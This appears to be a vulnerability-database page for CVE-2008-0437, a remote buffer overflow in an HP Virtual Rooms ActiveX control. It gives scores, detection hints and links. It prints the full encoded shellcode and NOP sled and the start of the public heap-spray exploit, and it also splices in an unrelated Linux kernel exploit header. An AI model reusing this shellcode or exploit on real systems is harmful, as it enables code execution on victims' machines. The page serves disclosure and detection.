CVE-2008-0437
published 2008-01-23CVE-2008-0437: Multiple buffer overflows in the WebHPVCInstall.HPVirtualRooms14 ActiveX control in HPVirtualRooms14.dll 1.0.0.100, as used in the installation process for HP…
PriorityP355critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
58.08%
99.0th percentile
Multiple buffer overflows in the WebHPVCInstall.HPVirtualRooms14 ActiveX control in HPVirtualRooms14.dll 1.0.0.100, as used in the installation process for HP Virtual Rooms, allow remote attackers to execute arbitrary code via a long (1) AuthenticationURL, (2) PortalAPIURL, or (3) cabroot property value. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | virtual_rooms | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653%u314e%u7475%u7038%u7765%u4370
bytes↗
%u9090%u9090
- →The public exploit uses an Alpha2-encoded win32_exec shellcode (EXITFUNC=seh, CMD=c:\windows\system32\calc.exe) with NOP sled (%u9090%u9090) delivered via heap spray in JavaScript; detect large unescape() heap spray patterns in browser script contexts. ↗
- →The exploit targets Internet Explorer's ActiveX instantiation; alert on creation of 'WebHPVCInstall.HPVirtualRooms14' objects from web content, especially when followed by property assignments with unusually long strings. ↗
- ·Version 1.0.0.100 of HPVirtualRooms14.dll is the confirmed vulnerable version; other versions are not confirmed affected by the source. ↗
- ·Some vulnerability details are derived from third-party information and may not be fully authoritative. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' Null Pointer Dereference Denial of Service
exploitdb·2008-07-31
CVE-2010-0437 Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' Null Pointer Dereference Denial of Service
Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' Null Pointer Dereference Denial of Service
---
/*
source: https://www.securityfocus.com/bid/38185/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.
*/
/* gcc -std=gnu99 -O2 -g -lpthread -lrt tunload.c -o tunload */
/*****************************************************************************
* Copyright (C) 2008 Remi Denis-Courmont. All rights reserved. *
* *
* Redistribution and use in source and binary forms, with or without *
* modification, are permitted provided that the above copyright notice
Exploit-DB
HP Virtual Rooms WebHPVCInstall Control - Remote Buffer Overflow
exploitdb·2008-01-22
CVE-2008-0437 HP Virtual Rooms WebHPVCInstall Control - Remote Buffer Overflow
HP Virtual Rooms WebHPVCInstall Control - Remote Buffer Overflow
---
HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit
function Check() {
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
"%u4842%u7a6b%u7754%u524b%u667
No writeups or analysis indexed.
http://marc.info/?l=full-disclosure&m=120098751528333&w=2http://secunia.com/advisories/28595http://www.securityfocus.com/bid/27384http://www.vupen.com/english/advisories/2008/0236https://exchange.xforce.ibmcloud.com/vulnerabilities/39836https://www.exploit-db.com/exploits/4959http://marc.info/?l=full-disclosure&m=120098751528333&w=2http://secunia.com/advisories/28595http://www.securityfocus.com/bid/27384http://www.vupen.com/english/advisories/2008/0236https://exchange.xforce.ibmcloud.com/vulnerabilities/39836https://www.exploit-db.com/exploits/4959
2008-01-23
Published